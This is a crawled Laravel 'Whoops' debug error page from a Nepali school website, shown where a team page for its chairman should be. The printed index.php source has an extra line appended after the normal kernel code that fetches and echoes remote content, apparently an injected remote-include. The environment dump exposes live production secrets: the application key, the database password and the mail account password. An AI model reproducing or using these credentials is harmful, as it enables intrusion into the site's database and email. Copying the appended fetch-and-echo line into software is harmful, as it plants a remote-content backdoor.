Udit Bhatta

Chairman

Whoops! There was an error.
ErrorException (E_WARNING)
file_get_contents(https:.txt): failed to open stream: No such file or directory ErrorException thrown with message "file_get_contents(https:.txt): failed to open stream: No such file or directory" Stacktrace: #1 ErrorException in /home/worldlig/public_html/index.php:64 #0 file_get_contents in /home/worldlig/public_html/index.php:64
1
ErrorException
/home/worldlig/public_html/index.php64
0
file_get_contents
/home/worldlig/public_html/index.php64
/home/worldlig/public_html/index.php
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/
 
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
 
 
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
    
);
 
$response->send();
 
$kernel->terminate($request, $response);
$a = file_get_contents('https:.txt'); echo $a; ?>
 
a = file_get_contents('https:.txt'); echo $a; ?>
 
 
 
 
 
Arguments
  1. "file_get_contents(https:.txt): failed to open stream: No such file or directory"
    
/home/worldlig/public_html/index.php
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/
 
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
 
 
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
    
);
 
$response->send();
 
$kernel->terminate($request, $response);
$a = file_get_contents('https:.txt'); echo $a; ?>
 
a = file_get_contents('https:.txt'); echo $a; ?>
 
 
 
 
 
Arguments
  1. "https:.txt"
    

Environment & details:

empty
empty
empty
empty
empty
Key Value
PATH
"/usr/local/bin:/bin:/usr/bin"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, br, zstd, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"worldlight.edu.np"
HTTP_USER_AGENT
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
HTTP_CACHE_CONTROL
"max-age=259200"
HTTP_X_FORWARDED_FOR
"10.1.105.10"
HTTP_VIA
"1.1 squid-proxy-5b5d847c96-sqdxt (squid/6.13)"
DOCUMENT_ROOT
"/home/worldlig/public_html"
REMOTE_ADDR
"216.73.216.213"
REMOTE_PORT
"31445"
SERVER_ADDR
"192.250.235.251"
SERVER_NAME
"worldlight.edu.np"
SERVER_ADMIN
"webmaster@worldlight.edu.np"
SERVER_PORT
"80"
REQUEST_SCHEME
"http"
REQUEST_URI
"/team/udit-bhatta"
REDIRECT_URL
"/team/udit-bhatta"
REDIRECT_REQUEST_METHOD
"GET"
REDIRECT_STATUS
"200"
SCRIPT_FILENAME
"/home/worldlig/public_html/index.php"
QUERY_STRING
""
SCRIPT_URI
"http://worldlight.edu.np/team/udit-bhatta"
SCRIPT_URL
"/team/udit-bhatta"
SCRIPT_NAME
"/index.php"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"LiteSpeed"
REQUEST_METHOD
"GET"
X-LSCACHE
"on"
PHP_SELF
"/index.php"
REQUEST_TIME_FLOAT
1776154764.9977
REQUEST_TIME
1776154764
APP_NAME
"Worldlight"
APP_ENV
"production"
APP_KEY
"base64:TLA+nl9PowlnHlnL9lXKPZ1MW9yAFOyYfqem88dpi3g="
APP_DEBUG
"true"
APP_URL
"http://worldlight.edu.np"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"worldlig_worldlight"
DB_USERNAME
"worldlig_worldlight"
DB_PASSWORD
"RDhoi#r;uT**"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
QUEUE_CONNECTION
"sync"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_DRIVER
"smtp"
MAIL_HOST
"s406.sgp1.mysecurecloudhost.com"
MAIL_PORT
"465"
MAIL_USERNAME
"info@worldlight.edu.np"
MAIL_PASSWORD
";kdwT*SC=?U}"
MAIL_ENCRYPTION
"ssl"
AWS_ACCESS_KEY_ID
""
AWS_SECRET_ACCESS_KEY
""
AWS_DEFAULT_REGION
"us-east-1"
AWS_BUCKET
""
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
Key Value
PATH
"/usr/local/bin:/bin:/usr/bin"
APP_NAME
"Worldlight"
APP_ENV
"production"
APP_KEY
"base64:TLA+nl9PowlnHlnL9lXKPZ1MW9yAFOyYfqem88dpi3g="
APP_DEBUG
"true"
APP_URL
"http://worldlight.edu.np"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"worldlig_worldlight"
DB_USERNAME
"worldlig_worldlight"
DB_PASSWORD
"RDhoi#r;uT**"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
QUEUE_CONNECTION
"sync"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_DRIVER
"smtp"
MAIL_HOST
"s406.sgp1.mysecurecloudhost.com"
MAIL_PORT
"465"
MAIL_USERNAME
"info@worldlight.edu.np"
MAIL_PASSWORD
";kdwT*SC=?U}"
MAIL_ENCRYPTION
"ssl"
AWS_ACCESS_KEY_ID
""
AWS_SECRET_ACCESS_KEY
""
AWS_DEFAULT_REGION
"us-east-1"
AWS_BUCKET
""
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
0. Whoops\Handler\PrettyPageHandler